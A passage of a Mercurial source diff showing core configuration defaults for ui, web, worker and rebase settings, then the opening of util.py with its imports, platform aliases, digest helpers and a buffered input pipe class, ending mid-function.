1133 coreconfigitem('ui', 'timeout.warn',
1131 default=0,
1134 default=0,
1132 )
1135 )
1133 coreconfigitem('ui', 'traceback',
1136 coreconfigitem('ui', 'traceback',
1134 default=False,
1137 default=False,
1135 )
1138 )
1136 coreconfigitem('ui', 'tweakdefaults',
1139 coreconfigitem('ui', 'tweakdefaults',
1137 default=False,
1140 default=False,
1138 )
1141 )
1139 coreconfigitem('ui', 'username',
1142 coreconfigitem('ui', 'username',
1140 alias=[('ui', 'user')]
1143 alias=[('ui', 'user')]
1141 )
1144 )
1142 coreconfigitem('ui', 'verbose',
1145 coreconfigitem('ui', 'verbose',
1143 default=False,
1146 default=False,
1144 )
1147 )
1145 coreconfigitem('verify', 'skipflags',
1148 coreconfigitem('verify', 'skipflags',
1146 default=None,
1149 default=None,
1147 )
1150 )
1148 coreconfigitem('web', 'allowbz2',
1151 coreconfigitem('web', 'allowbz2',
1149 default=False,
1152 default=False,
1150 )
1153 )
1151 coreconfigitem('web', 'allowgz',
1154 coreconfigitem('web', 'allowgz',
1152 default=False,
1155 default=False,
1153 )
1156 )
1154 coreconfigitem('web', 'allow-pull',
1157 coreconfigitem('web', 'allow-pull',
1155 alias=[('web', 'allowpull')],
1158 alias=[('web', 'allowpull')],
1156 default=True,
1159 default=True,
1157 )
1160 )
1158 coreconfigitem('web', 'allow-push',
1161 coreconfigitem('web', 'allow-push',
1159 alias=[('web', 'allow_push')],
1162 alias=[('web', 'allow_push')],
1160 default=list,
1163 default=list,
1161 )
1164 )
1162 coreconfigitem('web', 'allowzip',
1165 coreconfigitem('web', 'allowzip',
1163 default=False,
1166 default=False,
1164 )
1167 )
1165 coreconfigitem('web', 'archivesubrepos',
1168 coreconfigitem('web', 'archivesubrepos',
1166 default=False,
1169 default=False,
1167 )
1170 )
1168 coreconfigitem('web', 'cache',
1171 coreconfigitem('web', 'cache',
1169 default=True,
1172 default=True,
1170 )
1173 )
1171 coreconfigitem('web', 'contact',
1174 coreconfigitem('web', 'contact',
1172 default=None,
1175 default=None,
1173 )
1176 )
1174 coreconfigitem('web', 'deny_push',
1177 coreconfigitem('web', 'deny_push',
1175 default=list,
1178 default=list,
1176 )
1179 )
1177 coreconfigitem('web', 'guessmime',
1180 coreconfigitem('web', 'guessmime',
1178 default=False,
1181 default=False,
1179 )
1182 )
1180 coreconfigitem('web', 'hidden',
1183 coreconfigitem('web', 'hidden',
1181 default=False,
1184 default=False,
1182 )
1185 )
1183 coreconfigitem('web', 'labels',
1186 coreconfigitem('web', 'labels',
1184 default=list,
1187 default=list,
1185 )
1188 )
1186 coreconfigitem('web', 'logoimg',
1189 coreconfigitem('web', 'logoimg',
1187 default='hglogo.png',
1190 default='hglogo.png',
1188 )
1191 )
1189 coreconfigitem('web', 'logourl',
1192 coreconfigitem('web', 'logourl',
1190 default='https://mercurial-scm.org/',
1193 default='https://mercurial-scm.org/',
1191 )
1194 )
1192 coreconfigitem('web', 'accesslog',
1195 coreconfigitem('web', 'accesslog',
1193 default='-',
1196 default='-',
1194 )
1197 )
1195 coreconfigitem('web', 'address',
1198 coreconfigitem('web', 'address',
1196 default='',
1199 default='',
1197 )
1200 )
1198 coreconfigitem('web', 'allow_archive',
1201 coreconfigitem('web', 'allow_archive',
1199 default=list,
1202 default=list,
1200 )
1203 )
1201 coreconfigitem('web', 'allow_read',
1204 coreconfigitem('web', 'allow_read',
1202 default=list,
1205 default=list,
1203 )
1206 )
1204 coreconfigitem('web', 'baseurl',
1207 coreconfigitem('web', 'baseurl',
1205 default=None,
1208 default=None,
1206 )
1209 )
1207 coreconfigitem('web', 'cacerts',
1210 coreconfigitem('web', 'cacerts',
1208 default=None,
1211 default=None,
1209 )
1212 )
1210 coreconfigitem('web', 'certificate',
1213 coreconfigitem('web', 'certificate',
1211 default=None,
1214 default=None,
1212 )
1215 )
1213 coreconfigitem('web', 'collapse',
1216 coreconfigitem('web', 'collapse',
1214 default=False,
1217 default=False,
1215 )
1218 )
1216 coreconfigitem('web', 'csp',
1219 coreconfigitem('web', 'csp',
1217 default=None,
1220 default=None,
1218 )
1221 )
1219 coreconfigitem('web', 'deny_read',
1222 coreconfigitem('web', 'deny_read',
1220 default=list,
1223 default=list,
1221 )
1224 )
1222 coreconfigitem('web', 'descend',
1225 coreconfigitem('web', 'descend',
1223 default=True,
1226 default=True,
1224 )
1227 )
1225 coreconfigitem('web', 'description',
1228 coreconfigitem('web', 'description',
1226 default="",
1229 default="",
1227 )
1230 )
1228 coreconfigitem('web', 'encoding',
1231 coreconfigitem('web', 'encoding',
1229 default=lambda: encoding.encoding,
1232 default=lambda: encoding.encoding,
1230 )
1233 )
1231 coreconfigitem('web', 'errorlog',
1234 coreconfigitem('web', 'errorlog',
1232 default='-',
1235 default='-',
1233 )
1236 )
1234 coreconfigitem('web', 'ipv6',
1237 coreconfigitem('web', 'ipv6',
1235 default=False,
1238 default=False,
1236 )
1239 )
1237 coreconfigitem('web', 'maxchanges',
1240 coreconfigitem('web', 'maxchanges',
1238 default=10,
1241 default=10,
1239 )
1242 )
1240 coreconfigitem('web', 'maxfiles',
1243 coreconfigitem('web', 'maxfiles',
1241 default=10,
1244 default=10,
1242 )
1245 )
1243 coreconfigitem('web', 'maxshortchanges',
1246 coreconfigitem('web', 'maxshortchanges',
1244 default=60,
1247 default=60,
1245 )
1248 )
1246 coreconfigitem('web', 'motd',
1249 coreconfigitem('web', 'motd',
1247 default='',
1250 default='',
1248 )
1251 )
1249 coreconfigitem('web', 'name',
1252 coreconfigitem('web', 'name',
1250 default=dynamicdefault,
1253 default=dynamicdefault,
1251 )
1254 )
1252 coreconfigitem('web', 'port',
1255 coreconfigitem('web', 'port',
1253 default=8000,
1256 default=8000,
1254 )
1257 )
1255 coreconfigitem('web', 'prefix',
1258 coreconfigitem('web', 'prefix',
1256 default='',
1259 default='',
1257 )
1260 )
1258 coreconfigitem('web', 'push_ssl',
1261 coreconfigitem('web', 'push_ssl',
1259 default=True,
1262 default=True,
1260 )
1263 )
1261 coreconfigitem('web', 'refreshinterval',
1264 coreconfigitem('web', 'refreshinterval',
1262 default=20,
1265 default=20,
1263 )
1266 )
1264 coreconfigitem('web', 'server-header',
1267 coreconfigitem('web', 'server-header',
1265 default=None,
1268 default=None,
1266 )
1269 )
1267 coreconfigitem('web', 'staticurl',
1270 coreconfigitem('web', 'staticurl',
1268 default=None,
1271 default=None,
1269 )
1272 )
1270 coreconfigitem('web', 'stripes',
1273 coreconfigitem('web', 'stripes',
1271 default=1,
1274 default=1,
1272 )
1275 )
1273 coreconfigitem('web', 'style',
1276 coreconfigitem('web', 'style',
1274 default='paper',
1277 default='paper',
1275 )
1278 )
1276 coreconfigitem('web', 'templates',
1279 coreconfigitem('web', 'templates',
1277 default=None,
1280 default=None,
1278 )
1281 )
1279 coreconfigitem('web', 'view',
1282 coreconfigitem('web', 'view',
1280 default='served',
1283 default='served',
1281 )
1284 )
1282 coreconfigitem('worker', 'backgroundclose',
1285 coreconfigitem('worker', 'backgroundclose',
1283 default=dynamicdefault,
1286 default=dynamicdefault,
1284 )
1287 )
1285 # Windows defaults to a limit of 512 open files. A buffer of 128
1288 # Windows defaults to a limit of 512 open files. A buffer of 128
1286 # should give us enough headway.
1289 # should give us enough headway.
1287 coreconfigitem('worker', 'backgroundclosemaxqueue',
1290 coreconfigitem('worker', 'backgroundclosemaxqueue',
1288 default=384,
1291 default=384,
1289 )
1292 )
1290 coreconfigitem('worker', 'backgroundcloseminfilecount',
1293 coreconfigitem('worker', 'backgroundcloseminfilecount',
1291 default=2048,
1294 default=2048,
1292 )
1295 )
1293 coreconfigitem('worker', 'backgroundclosethreadcount',
1296 coreconfigitem('worker', 'backgroundclosethreadcount',
1294 default=4,
1297 default=4,
1295 )
1298 )
1296 coreconfigitem('worker', 'enabled',
1299 coreconfigitem('worker', 'enabled',
1297 default=True,
1300 default=True,
1298 )
1301 )
1299 coreconfigitem('worker', 'numcpus',
1302 coreconfigitem('worker', 'numcpus',
1300 default=None,
1303 default=None,
1301 )
1304 )
1302
1305
1303 # Rebase related configuration moved to core because other extension are doing
1306 # Rebase related configuration moved to core because other extension are doing
1304 # strange things. For example, shelve import the extensions to reuse some bit
1307 # strange things. For example, shelve import the extensions to reuse some bit
1305 # without formally loading it.
1308 # without formally loading it.
1306 coreconfigitem('commands', 'rebase.requiredest',
1309 coreconfigitem('commands', 'rebase.requiredest',
1307 default=False,
1310 default=False,
1308 )
1311 )
1309 coreconfigitem('experimental', 'rebaseskipobsolete',
1312 coreconfigitem('experimental', 'rebaseskipobsolete',
1310 default=True,
1313 default=True,
1311 )
1314 )
1312 coreconfigitem('rebase', 'singletransaction',
1315 coreconfigitem('rebase', 'singletransaction',
1313 default=False,
1316 default=False,
1314 )
1317 )
1315 coreconfigitem('rebase', 'experimental.inmemory',
1318 coreconfigitem('rebase', 'experimental.inmemory',
1316 default=False,
1319 default=False,
1317 )
1320 )
@@ -1,4365 +1,4373 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
74 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
76 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
77 xmlrpclib = pycompat.xmlrpclib
78
78
79 httpserver = urllibcompat.httpserver
79 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
80 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
81 urlreq = urllibcompat.urlreq
82
82
83 # workaround for win32mbcs
83 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
84 _filenamebytestr = pycompat.bytestr
85
85
86 def isatty(fp):
86 def isatty(fp):
87 try:
87 try:
88 return fp.isatty()
88 return fp.isatty()
89 except AttributeError:
89 except AttributeError:
90 return False
90 return False
91
91
92 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
94 # buffering
95 if isatty(stdout):
95 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
97
98 if pycompat.iswindows:
98 if pycompat.iswindows:
99 from . import windows as platform
99 from . import windows as platform
100 stdout = platform.winstdout(stdout)
100 stdout = platform.winstdout(stdout)
101 else:
101 else:
102 from . import posix as platform
102 from . import posix as platform
103
103
104 _ = i18n._
104 _ = i18n._
105
105
106 bindunixsocket = platform.bindunixsocket
106 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
107 cachestat = platform.cachestat
108 checkexec = platform.checkexec
108 checkexec = platform.checkexec
109 checklink = platform.checklink
109 checklink = platform.checklink
110 copymode = platform.copymode
110 copymode = platform.copymode
111 executablepath = platform.executablepath
111 executablepath = platform.executablepath
112 expandglobs = platform.expandglobs
112 expandglobs = platform.expandglobs
113 explainexit = platform.explainexit
113 explainexit = platform.explainexit
114 findexe = platform.findexe
114 findexe = platform.findexe
115 getfsmountpoint = platform.getfsmountpoint
115 getfsmountpoint = platform.getfsmountpoint
116 getfstype = platform.getfstype
116 getfstype = platform.getfstype
117 gethgcmd = platform.gethgcmd
117 gethgcmd = platform.gethgcmd
118 getuser = platform.getuser
118 getuser = platform.getuser
119 getpid = os.getpid
119 getpid = os.getpid
120 groupmembers = platform.groupmembers
120 groupmembers = platform.groupmembers
121 groupname = platform.groupname
121 groupname = platform.groupname
122 hidewindow = platform.hidewindow
122 hidewindow = platform.hidewindow
123 isexec = platform.isexec
123 isexec = platform.isexec
124 isowner = platform.isowner
124 isowner = platform.isowner
125 listdir = osutil.listdir
125 listdir = osutil.listdir
126 localpath = platform.localpath
126 localpath = platform.localpath
127 lookupreg = platform.lookupreg
127 lookupreg = platform.lookupreg
128 makedir = platform.makedir
128 makedir = platform.makedir
129 nlinks = platform.nlinks
129 nlinks = platform.nlinks
130 normpath = platform.normpath
130 normpath = platform.normpath
131 normcase = platform.normcase
131 normcase = platform.normcase
132 normcasespec = platform.normcasespec
132 normcasespec = platform.normcasespec
133 normcasefallback = platform.normcasefallback
133 normcasefallback = platform.normcasefallback
134 openhardlinks = platform.openhardlinks
134 openhardlinks = platform.openhardlinks
135 oslink = platform.oslink
135 oslink = platform.oslink
136 parsepatchoutput = platform.parsepatchoutput
136 parsepatchoutput = platform.parsepatchoutput
137 pconvert = platform.pconvert
137 pconvert = platform.pconvert
138 poll = platform.poll
138 poll = platform.poll
139 popen = platform.popen
139 popen = platform.popen
140 posixfile = platform.posixfile
140 posixfile = platform.posixfile
141 quotecommand = platform.quotecommand
141 quotecommand = platform.quotecommand
142 readpipe = platform.readpipe
142 readpipe = platform.readpipe
143 rename = platform.rename
143 rename = platform.rename
144 removedirs = platform.removedirs
144 removedirs = platform.removedirs
145 samedevice = platform.samedevice
145 samedevice = platform.samedevice
146 samefile = platform.samefile
146 samefile = platform.samefile
147 samestat = platform.samestat
147 samestat = platform.samestat
148 setbinary = platform.setbinary
148 setbinary = platform.setbinary
149 setflags = platform.setflags
149 setflags = platform.setflags
150 setsignalhandler = platform.setsignalhandler
150 setsignalhandler = platform.setsignalhandler
151 shellquote = platform.shellquote
151 shellquote = platform.shellquote
152 shellsplit = platform.shellsplit
152 shellsplit = platform.shellsplit
153 spawndetached = platform.spawndetached
153 spawndetached = platform.spawndetached
154 split = platform.split
154 split = platform.split
155 sshargs = platform.sshargs
155 sshargs = platform.sshargs
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 statisexec = platform.statisexec
157 statisexec = platform.statisexec
158 statislink = platform.statislink
158 statislink = platform.statislink
159 testpid = platform.testpid
159 testpid = platform.testpid
160 umask = platform.umask
160 umask = platform.umask
161 unlink = platform.unlink
161 unlink = platform.unlink
162 username = platform.username
162 username = platform.username
163
163
164 try:
164 try:
165 recvfds = osutil.recvfds
165 recvfds = osutil.recvfds
166 except AttributeError:
166 except AttributeError:
167 pass
167 pass
168 try:
168 try:
169 setprocname = osutil.setprocname
169 setprocname = osutil.setprocname
170 except AttributeError:
170 except AttributeError:
171 pass
171 pass
172 try:
172 try:
173 unblocksignal = osutil.unblocksignal
173 unblocksignal = osutil.unblocksignal
174 except AttributeError:
174 except AttributeError:
175 pass
175 pass
176
176
177 # Python compatibility
177 # Python compatibility
178
178
179 _notset = object()
179 _notset = object()
180
180
181 def safehasattr(thing, attr):
181 def safehasattr(thing, attr):
182 return getattr(thing, attr, _notset) is not _notset
182 return getattr(thing, attr, _notset) is not _notset
183
183
184 def _rapply(f, xs):
184 def _rapply(f, xs):
185 if xs is None:
185 if xs is None:
186 # assume None means non-value of optional data
186 # assume None means non-value of optional data
187 return xs
187 return xs
188 if isinstance(xs, (list, set, tuple)):
188 if isinstance(xs, (list, set, tuple)):
189 return type(xs)(_rapply(f, x) for x in xs)
189 return type(xs)(_rapply(f, x) for x in xs)
190 if isinstance(xs, dict):
190 if isinstance(xs, dict):
191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 return f(xs)
192 return f(xs)
193
193
194 def rapply(f, xs):
194 def rapply(f, xs):
195 """Apply function recursively to every item preserving the data structure
195 """Apply function recursively to every item preserving the data structure
196
196
197 >>> def f(x):
197 >>> def f(x):
198 ... return 'f(%s)' % x
198 ... return 'f(%s)' % x
199 >>> rapply(f, None) is None
199 >>> rapply(f, None) is None
200 True
200 True
201 >>> rapply(f, 'a')
201 >>> rapply(f, 'a')
202 'f(a)'
202 'f(a)'
203 >>> rapply(f, {'a'}) == {'f(a)'}
203 >>> rapply(f, {'a'}) == {'f(a)'}
204 True
204 True
205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207
207
208 >>> xs = [object()]
208 >>> xs = [object()]
209 >>> rapply(pycompat.identity, xs) is xs
209 >>> rapply(pycompat.identity, xs) is xs
210 True
210 True
211 """
211 """
212 if f is pycompat.identity:
212 if f is pycompat.identity:
213 # fast path mainly for py2
213 # fast path mainly for py2
214 return xs
214 return xs
215 return _rapply(f, xs)
215 return _rapply(f, xs)
216
216
217 def bitsfrom(container):
217 def bitsfrom(container):
218 bits = 0
218 bits = 0
219 for bit in container:
219 for bit in container:
220 bits |= bit
220 bits |= bit
221 return bits
221 return bits
222
222
223 # python 2.6 still have deprecation warning enabled by default. We do not want
223 # python 2.6 still have deprecation warning enabled by default. We do not want
224 # to display anything to standard user so detect if we are running test and
224 # to display anything to standard user so detect if we are running test and
225 # only use python deprecation warning in this case.
225 # only use python deprecation warning in this case.
226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 if _dowarn:
227 if _dowarn:
228 # explicitly unfilter our warning for python 2.7
228 # explicitly unfilter our warning for python 2.7
229 #
229 #
230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 # However, module name set through PYTHONWARNINGS was exactly matched, so
231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 if _dowarn and pycompat.ispy3:
237 if _dowarn and pycompat.ispy3:
238 # silence warning emitted by passing user string to re.sub()
238 # silence warning emitted by passing user string to re.sub()
239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 r'mercurial')
240 r'mercurial')
241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 DeprecationWarning, r'mercurial')
242 DeprecationWarning, r'mercurial')
243
243
244 def nouideprecwarn(msg, version, stacklevel=1):
244 def nouideprecwarn(msg, version, stacklevel=1):
245 """Issue an python native deprecation warning
245 """Issue an python native deprecation warning
246
246
247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 """
248 """
249 if _dowarn:
249 if _dowarn:
250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 " update your code.)") % version
251 " update your code.)") % version
252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253
253
254 DIGESTS = {
254 DIGESTS = {
255 'md5': hashlib.md5,
255 'md5': hashlib.md5,
256 'sha1': hashlib.sha1,
256 'sha1': hashlib.sha1,
257 'sha512': hashlib.sha512,
257 'sha512': hashlib.sha512,
258 }
258 }
259 # List of digest types from strongest to weakest
259 # List of digest types from strongest to weakest
260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261
261
262 for k in DIGESTS_BY_STRENGTH:
262 for k in DIGESTS_BY_STRENGTH:
263 assert k in DIGESTS
263 assert k in DIGESTS
264
264
265 class digester(object):
265 class digester(object):
266 """helper to compute digests.
266 """helper to compute digests.
267
267
268 This helper can be used to compute one or more digests given their name.
268 This helper can be used to compute one or more digests given their name.
269
269
270 >>> d = digester([b'md5', b'sha1'])
270 >>> d = digester([b'md5', b'sha1'])
271 >>> d.update(b'foo')
271 >>> d.update(b'foo')
272 >>> [k for k in sorted(d)]
272 >>> [k for k in sorted(d)]
273 ['md5', 'sha1']
273 ['md5', 'sha1']
274 >>> d[b'md5']
274 >>> d[b'md5']
275 'acbd18db4cc2f85cedef654fccc4a4d8'
275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 >>> d[b'sha1']
276 >>> d[b'sha1']
277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 >>> digester.preferred([b'md5', b'sha1'])
278 >>> digester.preferred([b'md5', b'sha1'])
279 'sha1'
279 'sha1'
280 """
280 """
281
281
282 def __init__(self, digests, s=''):
282 def __init__(self, digests, s=''):
283 self._hashes = {}
283 self._hashes = {}
284 for k in digests:
284 for k in digests:
285 if k not in DIGESTS:
285 if k not in DIGESTS:
286 raise Abort(_('unknown digest type: %s') % k)
286 raise Abort(_('unknown digest type: %s') % k)
287 self._hashes[k] = DIGESTS[k]()
287 self._hashes[k] = DIGESTS[k]()
288 if s:
288 if s:
289 self.update(s)
289 self.update(s)
290
290
291 def update(self, data):
291 def update(self, data):
292 for h in self._hashes.values():
292 for h in self._hashes.values():
293 h.update(data)
293 h.update(data)
294
294
295 def __getitem__(self, key):
295 def __getitem__(self, key):
296 if key not in DIGESTS:
296 if key not in DIGESTS:
297 raise Abort(_('unknown digest type: %s') % k)
297 raise Abort(_('unknown digest type: %s') % k)
298 return nodemod.hex(self._hashes[key].digest())
298 return nodemod.hex(self._hashes[key].digest())
299
299
300 def __iter__(self):
300 def __iter__(self):
301 return iter(self._hashes)
301 return iter(self._hashes)
302
302
303 @staticmethod
303 @staticmethod
304 def preferred(supported):
304 def preferred(supported):
305 """returns the strongest digest type in both supported and DIGESTS."""
305 """returns the strongest digest type in both supported and DIGESTS."""
306
306
307 for k in DIGESTS_BY_STRENGTH:
307 for k in DIGESTS_BY_STRENGTH:
308 if k in supported:
308 if k in supported:
309 return k
309 return k
310 return None
310 return None
311
311
312 class digestchecker(object):
312 class digestchecker(object):
313 """file handle wrapper that additionally checks content against a given
313 """file handle wrapper that additionally checks content against a given
314 size and digests.
314 size and digests.
315
315
316 d = digestchecker(fh, size, {'md5': '...'})
316 d = digestchecker(fh, size, {'md5': '...'})
317
317
318 When multiple digests are given, all of them are validated.
318 When multiple digests are given, all of them are validated.
319 """
319 """
320
320
321 def __init__(self, fh, size, digests):
321 def __init__(self, fh, size, digests):
322 self._fh = fh
322 self._fh = fh
323 self._size = size
323 self._size = size
324 self._got = 0
324 self._got = 0
325 self._digests = dict(digests)
325 self._digests = dict(digests)
326 self._digester = digester(self._digests.keys())
326 self._digester = digester(self._digests.keys())
327
327
328 def read(self, length=-1):
328 def read(self, length=-1):
329 content = self._fh.read(length)
329 content = self._fh.read(length)
330 self._digester.update(content)
330 self._digester.update(content)
331 self._got += len(content)
331 self._got += len(content)
332 return content
332 return content
333
333
334 def validate(self):
334 def validate(self):
335 if self._size != self._got:
335 if self._size != self._got:
336 raise Abort(_('size mismatch: expected %d, got %d') %
336 raise Abort(_('size mismatch: expected %d, got %d') %
337 (self._size, self._got))
337 (self._size, self._got))
338 for k, v in self._digests.items():
338 for k, v in self._digests.items():
339 if v != self._digester[k]:
339 if v != self._digester[k]:
340 # i18n: first parameter is a digest name
340 # i18n: first parameter is a digest name
341 raise Abort(_('%s mismatch: expected %s, got %s') %
341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 (k, v, self._digester[k]))
342 (k, v, self._digester[k]))
343
343
344 try:
344 try:
345 buffer = buffer
345 buffer = buffer
346 except NameError:
346 except NameError:
347 def buffer(sliceable, offset=0, length=None):
347 def buffer(sliceable, offset=0, length=None):
348 if length is not None:
348 if length is not None:
349 return memoryview(sliceable)[offset:offset + length]
349 return memoryview(sliceable)[offset:offset + length]
350 return memoryview(sliceable)[offset:]
350 return memoryview(sliceable)[offset:]
351
351
352 closefds = pycompat.isposix
352 closefds = pycompat.isposix
353
353
354 _chunksize = 4096
354 _chunksize = 4096
355
355
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        # The wrapped pipe/file object; only its fileno() is used for reads.
        self._input = input
        # Chunks read from the pipe but not yet consumed. _frombuffer()
        # collapses this to at most one chunk after every read/readline.
        self._buffer = []
        # Set once os.read() returns empty, i.e. the descriptor is exhausted.
        self._eof = False
        # Total number of buffered bytes across all chunks in _buffer.
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # Delegate closed-ness to the wrapped pipe.
        return self._input.closed

    def fileno(self):
        # Expose the underlying descriptor so callers can select()/poll() it.
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` bytes; fewer only at end of stream."""
        # Keep pulling chunks until enough bytes are buffered or EOF is hit.
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        # NOTE(review): extra arguments are accepted for file-object API
        # compatibility but are ignored (no ``limit`` support) — confirm no
        # caller relies on passing one.
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline in the most recent chunk, or -1.
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        # Read more chunks until a newline shows up or we reach EOF.
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        # Number of bytes to return: through the newline, or everything
        # buffered when no newline was found before EOF.
        size = lfi + 1
